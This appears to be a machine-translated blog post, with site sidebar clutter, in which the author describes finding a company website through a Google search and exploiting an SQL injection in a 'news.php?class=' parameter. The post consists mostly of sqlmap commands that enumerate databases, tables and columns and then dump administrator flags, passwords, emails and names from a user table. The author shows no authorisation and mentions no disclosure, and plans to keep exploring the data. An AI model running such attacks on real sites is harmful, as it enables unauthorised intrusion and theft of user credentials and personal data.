当前位置:网站首页>Record the SQL injection vulnerability of XX company
Record the SQL injection vulnerability of XX company
2022-07-29 05:42:00 【adeylinux】
In the morning , When I get up , My friend , Ask me to participate in public welfare SRC. Then I was dragged to explore public welfare SRC. I opened it. Google Search for :inurl: Science and technology company . Then I opened a website . I previewed the website and found ?id Because of occupational disease . I am here ?id After that, a Single quotation marks ok ah . The page changes . I guess so xss perhaps SQL Inject holes .
Start penetration testing .
take out sqlmap Just a shuttle .
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="
The result is really flawed . Then continue to test ,
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs
Here are two libraries :bdm818993245_db,information_schema
Then a shuttle .
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables
bdm818993245_db Under the database 9 A watch :
| user |
| gplat_book |
| gplat_news |
| gplat_newsclass |
| gplat_newsclass2 |
| href |
| job |
| job_add |
| lawyer_wenda |
Next query user The following administrator and password .
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns
Space allowed user The following are 13 Columns :
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| adder | varchar(8) |
| admin | int(2) |
| email | varchar(60) |
| grade | varchar(12) |
| id | int(6) |
| image | varchar(70) |
| name | varchar(60) |
| pass | varchar(60) |
| phone | varchar(14) |
| qianming | varchar(100) |
| times | datetime |
| up_time | datetime |
| xingb | varchar(2) |
+-----------+---------------+
Next query user below admni and pass The data of :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump
Next, collect the data of the database :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump
Then collect data :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C
Query the user name of the administrator :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C name --dump
The collection is almost done . End the penetration test . I will study the rest of the databases, tables and columns slowly .
summary :
SQl Injection try to use hand injection . Because tools run websites . It's easy to jump .
My public number . Please take care of me .
边栏推荐
- HCIA-R&S自用笔记(27)综合实验
- Longest string without duplicate characters
- 微信小程序-屏幕高度
- 移动端-flex项目属性
- uniapp组件之选择选项(如套餐选择)
- JS deep copy - Notes
- [C language series] - three methods to simulate the implementation of strlen library functions
- JS simple code determines whether the device that opens the page is the PC end of the computer, the H5 end of the mobile phone, or the wechat end
- WIN10 编译ffmpeg(包含ffplay)
- 实现table某个单元格背景色设置
猜你喜欢
[typescript] in depth study of typescript functions
HCIA-R&S自用笔记(27)综合实验
[C language series] - three methods to simulate the implementation of strlen library functions
AR虚拟增强与现实
[C language series] - string + partial escape character explanation + annotation tips
Hcia-r & s self use notes (26) PPP
uniapp之常用提示弹框
ClickHouse学习(九)clickhouse整合mysql
OpenAtom OpenHarmony分论坛圆满举办,生态与产业发展迈向新征程
Liang Yuqi, founder of aitalk: the link between image and virtual reality
随机推荐
How does the MD editor of CSDN input superscripts and subscripts? The input method of formula and non formula is different
表格与表单相关知识点总结
Abstract classes and interfaces
Seay源代码审计系统
QFrame类学习笔记
H5语义化标签
[typescript] type reduction (including type protection) and type predicate in typescript
移动端-flex项目属性
nmap是什么以及使用教程
Detailed explanation of serial port communication
Win10 搭建MSYS2环境
[C language series] - storage of deep anatomical data in memory (II) - floating point type
Qtcreator+cmake compiler settings
Clickhouse learning (x) monitoring operation indicators
第三课threejs全景预览房间案例
[C language series] - string + partial escape character explanation + annotation tips
【JS题解】牛客网JS篇1-10题
Flask 报错 RuntimeError: The session is unavailable because no secret key was set.
Qframe class learning notes
table中同一列中合并相同项